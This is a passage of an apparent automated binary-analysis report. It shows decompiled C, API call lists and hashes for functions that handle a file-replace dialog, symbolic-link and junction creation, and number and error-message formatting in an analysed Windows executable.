                                                                                                                                                    0x0122b9b8
                                                                                                                                                    0x0122b9d4
                                                                                                                                                    0x0122b9de
                                                                                                                                                    0x0122b9e6
                                                                                                                                                    0x0122ba04
                                                                                                                                                    0x0122ba09
                                                                                                                                                    0x0122ba17
                                                                                                                                                    0x0122ba1e
                                                                                                                                                    0x0122ba2c
                                                                                                                                                    0x0122ba92
                                                                                                                                                    0x0122ba2e
                                                                                                                                                    0x0122ba48
                                                                                                                                                    0x0122ba4c
                                                                                                                                                    0x0122ba5b
                                                                                                                                                    0x0122ba63
                                                                                                                                                    0x0122ba77
                                                                                                                                                    0x0122ba7c
                                                                                                                                                    0x0122ba8a
                                                                                                                                                    0x0122ba8a
                                                                                                                                                    0x0122baa7
                                                                                                                                                    0x0122baad
                                                                                                                                                    0x0122bab8
                                                                                                                                                    0x0122bac7
                                                                                                                                                    0x0122bad7
                                                                                                                                                    0x0122baf1
                                                                                                                                                    0x0122bb09
                                                                                                                                                    0x0122bb13
                                                                                                                                                    0x0122bb1b
                                                                                                                                                    0x0122bb35
                                                                                                                                                    0x0122bb3a
                                                                                                                                                    0x0122bb48
                                                                                                                                                    0x0122bb56
                                                                                                                                                    0x0122bb5c
                                                                                                                                                    0x0122bb62
                                                                                                                                                    0x0122bb76
                                                                                                                                                    0x0122bb85
                                                                                                                                                    0x0122bb9c
                                                                                                                                                    0x0122bba1
                                                                                                                                                    0x0122bbaf
                                                                                                                                                    0x0122bbaf
                                                                                                                                                    0x0122bb62
                                                                                                                                                    0x0122bbb5
                                                                                                                                                    0x0122bbb5
                                                                                                                                                    0x0122bbb7
                                                                                                                                                    0x0122bbc1
                                                                                                                                                    0x0122bbc1
                                                                                                                                                    0x0122b872
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b87d
                                                                                                                                                    0x0122b87e
                                                                                                                                                    0x0122b880
                                                                                                                                                    0x0122b8a4
                                                                                                                                                    0x0122b8a4
                                                                                                                                                    0x0122b8a6
                                                                                                                                                    0x0122b8a6
                                                                                                                                                    0x0122b8a7
                                                                                                                                                    0x0122b8b1
                                                                                                                                                    0x0122b8b9
                                                                                                                                                    0x0122b8bc
                                                                                                                                                    0x0122b8bc
                                                                                                                                                    0x0122b8c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b8c4
                                                                                                                                                    0x0122b882
                                                                                                                                                    0x0122b885
                                                                                                                                                    0x0122b8d9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b8d9
                                                                                                                                                    0x0122b887
                                                                                                                                                    0x0122b88a
                                                                                                                                                    0x0122b8d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b8d6
                                                                                                                                                    0x0122b88c
                                                                                                                                                    0x0122b88f
                                                                                                                                                    0x0122b8d0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b8d0
                                                                                                                                                    0x0122b891
                                                                                                                                                    0x0122b894
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b896
                                                                                                                                                    0x0122b899
                                                                                                                                                    0x0122b8cc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b8cc
                                                                                                                                                    0x0122b89e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122b89e
                                                                                                                                                    0x0122b85f
                                                                                                                                                    0x0122b861
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0121130B: GetDlgItem.USER32(00000000,00003021), ref: 0121134F
                                                                                                                                                      • Part of subcall function 0121130B: SetWindowTextW.USER32(00000000,012425B4), ref: 01211365
                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0122B8B1
                                                                                                                                                    • EndDialog.USER32(?,00000006), ref: 0122B8C4
                                                                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0122B8E0
                                                                                                                                                    • SetFocus.USER32(00000000), ref: 0122B8E7
                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0122B921
                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0122B958
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0122B96E
                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0122B98C
                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0122B99C
                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0122B9B8
                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0122B9D4
                                                                                                                                                    • _swprintf.LIBCMT ref: 0122BA04
                                                                                                                                                      • Part of subcall function 01213FD6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01213FE9
                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0122BA17
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0122BA1E
                                                                                                                                                    • _swprintf.LIBCMT ref: 0122BA77
                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0122BA8A
                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0122BAA7
                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0122BAC7
                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0122BAD7
                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0122BAF1
                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0122BB09
                                                                                                                                                    • _swprintf.LIBCMT ref: 0122BB35
                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0122BB48
                                                                                                                                                    • _swprintf.LIBCMT ref: 0122BB9C
                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0122BBAF
                                                                                                                                                      • Part of subcall function 0122A5BC: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0122A5E2
                                                                                                                                                      • Part of subcall function 0122A5BC: GetNumberFormatW.KERNEL32 ref: 0122A631
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                    • API String ID: 797121971-1840816070
                                                                                                                                                    • Opcode ID: b5901c05dccf1836d4cfc0443cdf4d7d6b2a0b0d2f53fe0dd4722b577fb712ee
                                                                                                                                                    • Instruction ID: a84fd82e316eda822cbafcd702f00822d9183ea828da95383fe10ad7608a2277
                                                                                                                                                    • Opcode Fuzzy Hash: b5901c05dccf1836d4cfc0443cdf4d7d6b2a0b0d2f53fe0dd4722b577fb712ee
                                                                                                                                                    • Instruction Fuzzy Hash: FE917F72258359BFE231DAA4EC49FFF77ECEB49700F044819FB89D6085D67196048B62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01217165, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                    			E01217165(void* __edx) {
				void* __esi;
				signed int _t108;
				void* _t110;
				intOrPtr _t113;
				int _t115;
				intOrPtr _t118;
				signed int _t136;
				int _t142;
				void* _t176;
				void* _t179;
				void* _t184;
				short _t185;
				intOrPtr _t191;
				void* _t196;
				void* _t197;
				void* _t216;
				void* _t217;
				intOrPtr _t218;
				intOrPtr _t220;
				void* _t222;
				WCHAR* _t223;
				intOrPtr _t227;
				short _t231;
				void* _t232;
				intOrPtr _t233;
				short _t235;
				void* _t236;
				void* _t238;
				void* _t239;

				_t217 = __edx;
				E0122E0E4(E01241C05, _t236);
				E0122E1C0();
				 *((intOrPtr*)(_t236 - 0x1c)) = 1;
				if( *0x124feb3 == 0) {
					E01217BCE(L"SeRestorePrivilege");
					E01217BCE(L"SeCreateSymbolicLinkPrivilege");
					 *0x124feb3 = 1;
				}
				_t193 = _t236 - 0x30;
				E01217076(_t236 - 0x30, 0x1418);
				_t191 =  *((intOrPtr*)(_t236 + 0x10));
				 *(_t236 - 4) =  *(_t236 - 4) & 0x00000000;
				E0121FD96(_t236 - 0x1080, _t191 + 0x1104, 0x800);
				 *((intOrPtr*)(_t236 - 0x18)) = E012333F3(_t236 - 0x1080);
				_t226 = _t236 - 0x1080;
				_t222 = _t236 - 0x2080;
				_t108 = E01235668(_t236 - 0x1080, L"\\??\\", 4);
				_t239 = _t238 + 0x10;
				asm("sbb al, al");
				_t110 =  ~_t108 + 1;
				 *(_t236 - 0x10) = _t110;
				if(_t110 != 0) {
					_t226 = _t236 - 0x1078;
					_t184 = E01235668(_t236 - 0x1078, L"UNC\\", 4);
					_t239 = _t239 + 0xc;
					if(_t184 == 0) {
						_t185 = 0x5c;
						 *((short*)(_t236 - 0x2080)) = _t185;
						_t222 = _t236 - 0x207e;
						_t226 = _t236 - 0x1072;
					}
				}
				E01235646(_t222, _t226);
				_t113 = E012333F3(_t236 - 0x2080);
				_t227 =  *((intOrPtr*)(_t236 + 8));
				_t223 =  *(_t236 + 0xc);
				 *((intOrPtr*)(_t236 - 0x14)) = _t113;
				if( *((char*)(_t227 + 0x618f)) != 0) {
					L9:
					_push(1);
					_push(_t223);
					E01219F8F(_t193, _t236);
					if( *((char*)(_t191 + 0x10f1)) != 0 ||  *((char*)(_t191 + 0x2104)) != 0) {
						_t115 = CreateDirectoryW(_t223, 0);
						__eflags = _t115;
						if(_t115 == 0) {
							goto L27;
						}
						goto L14;
					} else {
						_t176 = CreateFileW(_t223, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t176 == 0xffffffff) {
							L27:
							 *((char*)(_t236 - 0x1c)) = 0;
							L28:
							E012115D1(_t236 - 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t236 - 0xc));
							return  *((intOrPtr*)(_t236 - 0x1c));
						}
						CloseHandle(_t176);
						L14:
						_t118 =  *((intOrPtr*)(_t191 + 0x1100));
						if(_t118 != 3) {
							__eflags = _t118 - 2;
							if(_t118 == 2) {
								L18:
								_t196 =  *(_t236 - 0x30);
								_t218 =  *((intOrPtr*)(_t236 - 0x18));
								 *_t196 = 0xa000000c;
								_t231 = _t218 + _t218;
								 *((short*)(_t196 + 0xa)) = _t231;
								 *((short*)(_t196 + 4)) = 0x10 + ( *((intOrPtr*)(_t236 - 0x14)) + _t218) * 2;
								 *((intOrPtr*)(_t196 + 6)) = 0;
								E01235646(_t196 + 0x14, _t236 - 0x1080);
								_t60 = _t231 + 2; // 0x3
								_t232 =  *(_t236 - 0x30);
								 *((short*)(_t232 + 0xc)) = _t60;
								 *((short*)(_t232 + 0xe)) =  *((intOrPtr*)(_t236 - 0x14)) +  *((intOrPtr*)(_t236 - 0x14));
								E01235646(_t232 + ( *((intOrPtr*)(_t236 - 0x18)) + 0xb) * 2, _t236 - 0x2080);
								_t136 =  *(_t236 - 0x10) & 0x000000ff ^ 0x00000001;
								__eflags = _t136;
								 *(_t232 + 0x10) = _t136;
								L19:
								_t197 = CreateFileW(_t223, 0xc0000000, 0, 0, 3, 0x2200000, 0);
								 *(_t236 - 0x10) = _t197;
								if(_t197 == 0xffffffff) {
									goto L27;
								}
								_t142 = DeviceIoControl(_t197, 0x900a4, _t232, ( *(_t232 + 4) & 0x0000ffff) + 8, 0, 0, _t236 - 0x34, 0);
								_t256 = _t142;
								if(_t142 != 0) {
									E012195B6(_t236 - 0x30a4);
									 *(_t236 - 4) = 1;
									E01217BAD(_t236 - 0x30a4,  *(_t236 - 0x10));
									_t233 =  *((intOrPtr*)(_t236 + 8));
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									E01219CA2(_t236 - 0x30a4, _t233,  ~( *(_t233 + 0x72c8)) & _t191 + 0x00001040,  ~( *(_t233 + 0x72cc)) & _t191 + 0x00001048,  ~( *(_t233 + 0x72d0)) & _t191 + 0x00001050);
									E01219670(_t236 - 0x30a4);
									__eflags =  *((char*)(_t233 + 0x61a0));
									if( *((char*)(_t233 + 0x61a0)) == 0) {
										E0121A384(_t223,  *((intOrPtr*)(_t191 + 0x24)));
									}
									E012195E8(_t236 - 0x30a4, _t233);
									goto L28;
								}
								CloseHandle( *(_t236 - 0x10));
								E01217032(_t256, 0x15, 0, _t223);
								_t154 = GetLastError();
								if(_t154 == 5 || _t154 == 0x522) {
									if(E0121FF7D() == 0) {
										E0121159C(_t236 - 0x80, 0x18);
										_t154 = E01220D97(_t236 - 0x80);
									}
								}
								E01232DC0(_t154);
								E01216F5B(0x124ff50, 9);
								_push(_t223);
								if( *((char*)(_t191 + 0x10f1)) == 0) {
									DeleteFileW();
								} else {
									RemoveDirectoryW();
								}
								goto L27;
							}
							__eflags = _t118 - 1;
							if(_t118 != 1) {
								goto L27;
							}
							goto L18;
						}
						_t216 =  *(_t236 - 0x30);
						_t220 =  *((intOrPtr*)(_t236 - 0x18));
						 *_t216 = 0xa0000003;
						_t235 = _t220 + _t220;
						 *((short*)(_t216 + 0xa)) = _t235;
						 *((short*)(_t216 + 4)) = 0xc + ( *((intOrPtr*)(_t236 - 0x14)) + _t220) * 2;
						 *((intOrPtr*)(_t216 + 6)) = 0;
						E01235646(_t216 + 0x10, _t236 - 0x1080);
						_t40 = _t235 + 2; // 0x3
						_t232 =  *(_t236 - 0x30);
						 *((short*)(_t232 + 0xc)) = _t40;
						 *((short*)(_t232 + 0xe)) =  *((intOrPtr*)(_t236 - 0x14)) +  *((intOrPtr*)(_t236 - 0x14));
						E01235646(_t232 + ( *((intOrPtr*)(_t236 - 0x18)) + 9) * 2, _t236 - 0x2080);
						goto L19;
					}
				}
				if( *(_t236 - 0x10) != 0) {
					goto L27;
				}
				_t179 = E0121B772(_t191 + 0x1104);
				_t249 = _t179;
				if(_t179 != 0) {
					goto L27;
				}
				_push(_t191 + 0x1104);
				_push(_t223);
				_push(_t191 + 0x28);
				_push(_t227);
				if(E0121798B(_t217, _t249) == 0) {
					goto L27;
				}
				goto L9;
			}
































                                                                                                                                                    0x01217165
                                                                                                                                                    0x0121716a
                                                                                                                                                    0x01217174
                                                                                                                                                    0x01217186
                                                                                                                                                    0x01217189
                                                                                                                                                    0x01217190
                                                                                                                                                    0x0121719a
                                                                                                                                                    0x0121719f
                                                                                                                                                    0x0121719f
                                                                                                                                                    0x012171aa
                                                                                                                                                    0x012171ad
                                                                                                                                                    0x012171b2
                                                                                                                                                    0x012171b5
                                                                                                                                                    0x012171cc
                                                                                                                                                    0x012171df
                                                                                                                                                    0x012171e2
                                                                                                                                                    0x012171ea
                                                                                                                                                    0x012171f6
                                                                                                                                                    0x012171fb
                                                                                                                                                    0x01217200
                                                                                                                                                    0x01217202
                                                                                                                                                    0x01217204
                                                                                                                                                    0x01217209
                                                                                                                                                    0x0121720d
                                                                                                                                                    0x0121721b
                                                                                                                                                    0x01217220
                                                                                                                                                    0x01217225
                                                                                                                                                    0x01217229
                                                                                                                                                    0x0121722a
                                                                                                                                                    0x01217231
                                                                                                                                                    0x01217237
                                                                                                                                                    0x01217237
                                                                                                                                                    0x01217225
                                                                                                                                                    0x0121723f
                                                                                                                                                    0x0121724b
                                                                                                                                                    0x01217250
                                                                                                                                                    0x01217256
                                                                                                                                                    0x01217259
                                                                                                                                                    0x01217263
                                                                                                                                                    0x0121729d
                                                                                                                                                    0x012172a0
                                                                                                                                                    0x012172a1
                                                                                                                                                    0x012172a2
                                                                                                                                                    0x012172ae
                                                                                                                                                    0x012172e5
                                                                                                                                                    0x012172eb
                                                                                                                                                    0x012172ed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012172b9
                                                                                                                                                    0x012172ca
                                                                                                                                                    0x012172d3
                                                                                                                                                    0x01217492
                                                                                                                                                    0x01217492
                                                                                                                                                    0x01217496
                                                                                                                                                    0x01217499
                                                                                                                                                    0x012174a7
                                                                                                                                                    0x012174b1
                                                                                                                                                    0x012174b1
                                                                                                                                                    0x012172da
                                                                                                                                                    0x012172f3
                                                                                                                                                    0x012172f3
                                                                                                                                                    0x012172fc
                                                                                                                                                    0x01217364
                                                                                                                                                    0x01217367
                                                                                                                                                    0x01217371
                                                                                                                                                    0x01217371
                                                                                                                                                    0x01217374
                                                                                                                                                    0x0121737c
                                                                                                                                                    0x01217382
                                                                                                                                                    0x01217385
                                                                                                                                                    0x01217390
                                                                                                                                                    0x01217396
                                                                                                                                                    0x012173a4
                                                                                                                                                    0x012173a9
                                                                                                                                                    0x012173ac
                                                                                                                                                    0x012173af
                                                                                                                                                    0x012173b8
                                                                                                                                                    0x012173cd
                                                                                                                                                    0x012173db
                                                                                                                                                    0x012173db
                                                                                                                                                    0x012173de
                                                                                                                                                    0x012173e1
                                                                                                                                                    0x012173f9
                                                                                                                                                    0x012173fb
                                                                                                                                                    0x01217401
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121741f
                                                                                                                                                    0x01217425
                                                                                                                                                    0x01217427
                                                                                                                                                    0x012174c2
                                                                                                                                                    0x012174d0
                                                                                                                                                    0x012174d4
                                                                                                                                                    0x012174d9
                                                                                                                                                    0x012174ea
                                                                                                                                                    0x012174fd
                                                                                                                                                    0x01217510
                                                                                                                                                    0x0121751b
                                                                                                                                                    0x01217526
                                                                                                                                                    0x0121752b
                                                                                                                                                    0x01217532
                                                                                                                                                    0x01217538
                                                                                                                                                    0x01217538
                                                                                                                                                    0x01217543
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01217543
                                                                                                                                                    0x01217430
                                                                                                                                                    0x0121743b
                                                                                                                                                    0x01217440
                                                                                                                                                    0x01217449
                                                                                                                                                    0x01217459
                                                                                                                                                    0x01217460
                                                                                                                                                    0x01217468
                                                                                                                                                    0x01217468
                                                                                                                                                    0x01217459
                                                                                                                                                    0x01217474
                                                                                                                                                    0x0121747d
                                                                                                                                                    0x01217489
                                                                                                                                                    0x0121748a
                                                                                                                                                    0x012174b4
                                                                                                                                                    0x0121748c
                                                                                                                                                    0x0121748c
                                                                                                                                                    0x0121748c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121748a
                                                                                                                                                    0x01217369
                                                                                                                                                    0x0121736b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121736b
                                                                                                                                                    0x012172fe
                                                                                                                                                    0x01217301
                                                                                                                                                    0x01217309
                                                                                                                                                    0x0121730f
                                                                                                                                                    0x01217312
                                                                                                                                                    0x0121731d
                                                                                                                                                    0x01217323
                                                                                                                                                    0x01217331
                                                                                                                                                    0x01217336
                                                                                                                                                    0x01217339
                                                                                                                                                    0x0121733c
                                                                                                                                                    0x01217345
                                                                                                                                                    0x0121735a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121735f
                                                                                                                                                    0x012172ae
                                                                                                                                                    0x01217269
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01217276
                                                                                                                                                    0x0121727b
                                                                                                                                                    0x0121727d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01217289
                                                                                                                                                    0x0121728a
                                                                                                                                                    0x0121728e
                                                                                                                                                    0x0121728f
                                                                                                                                                    0x01217297
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0121716A
                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 012172CA
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 012172DA
                                                                                                                                                      • Part of subcall function 01217BCE: GetCurrentProcess.KERNEL32(00000020,?), ref: 01217BDD
                                                                                                                                                      • Part of subcall function 01217BCE: GetLastError.KERNEL32 ref: 01217C23
                                                                                                                                                      • Part of subcall function 01217BCE: CloseHandle.KERNEL32(?), ref: 01217C32
                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 012172E5
                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 012173F3
                                                                                                                                                    • DeviceIoControl.KERNEL32 ref: 0121741F
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 01217430
                                                                                                                                                    • GetLastError.KERNEL32(00000015,00000000,?), ref: 01217440
                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0121748C
                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 012174B4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                    • API String ID: 3935142422-3508440684
                                                                                                                                                    • Opcode ID: f196f8e32e22037f8b21da25ff62f77bd97e28c69b09dde8aa3a8fe1f01b2c49
                                                                                                                                                    • Instruction ID: 298530d8c48abb4b2f769ec9fc599b30cd52cf1b2cfe449dcc0a6dec00170dea
                                                                                                                                                    • Opcode Fuzzy Hash: f196f8e32e22037f8b21da25ff62f77bd97e28c69b09dde8aa3a8fe1f01b2c49
                                                                                                                                                    • Instruction Fuzzy Hash: 5BB1CD7192021AAFDF21DB64DC44BFE77B8EFA4300F044069FA49E7245DB70AA45CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122A5BC, Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0122A5BC(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0x124d610 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0x126dca0 = _v304;
					 *0x126dca2 = 0;
					 *0x124d610 = 0x126dca0;
				}
				E0121FC65(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0x124d600, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}







                                                                                                                                                    0x0122a5d4
                                                                                                                                                    0x0122a5e2
                                                                                                                                                    0x0122a5ef
                                                                                                                                                    0x0122a5f7
                                                                                                                                                    0x0122a5fd
                                                                                                                                                    0x0122a5fd
                                                                                                                                                    0x0122a613
                                                                                                                                                    0x0122a618
                                                                                                                                                    0x0122a61d
                                                                                                                                                    0x0122a627
                                                                                                                                                    0x0122a631
                                                                                                                                                    0x0122a639
                                                                                                                                                    0x0122a644

                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0122A5E2
                                                                                                                                                    • GetNumberFormatW.KERNEL32 ref: 0122A631
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2169056816-0
                                                                                                                                                    • Opcode ID: 440bd949fb5310928a16225fe5f10b241be2573187b0ff2c0c9b0e418a54cf0a
                                                                                                                                                    • Instruction ID: d786d27e40283d6bc86d81e7dc751728843e93b87b0f72ca86a9949a6139a98a
                                                                                                                                                    • Opcode Fuzzy Hash: 440bd949fb5310928a16225fe5f10b241be2573187b0ff2c0c9b0e418a54cf0a
                                                                                                                                                    • Instruction Fuzzy Hash: 19015E3961021DAFDB20DFA5FC09FAB77BCEF59710F404422FA0897195D37099148BA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01216E5E, Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                    			E01216E5E(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}





                                                                                                                                                    0x01216e5e
                                                                                                                                                    0x01216e66
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01216e8d
                                                                                                                                                    0x01216e7f
                                                                                                                                                    0x01216e87
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(012210D8,?,00000200), ref: 01216E5E
                                                                                                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 01216E7F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                                    • Opcode ID: 88000df3a30c3f255d2e3f70aa4e279b4b74faa51926807694d1bf82a5f80c2b
                                                                                                                                                    • Instruction ID: ce48d8ccbd5f7cdbf06d43bb2dc3f002530928e3c758c3ba829797d453a2c8b6
                                                                                                                                                    • Opcode Fuzzy Hash: 88000df3a30c3f255d2e3f70aa4e279b4b74faa51926807694d1bf82a5f80c2b
                                                                                                                                                    • Instruction Fuzzy Hash: 40D0C735394302BFFA214D75FC0AF2A77D56765B81F10D6147356D90D4C5B19014DB19
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121D9D8, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                    			E0121D9D8(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
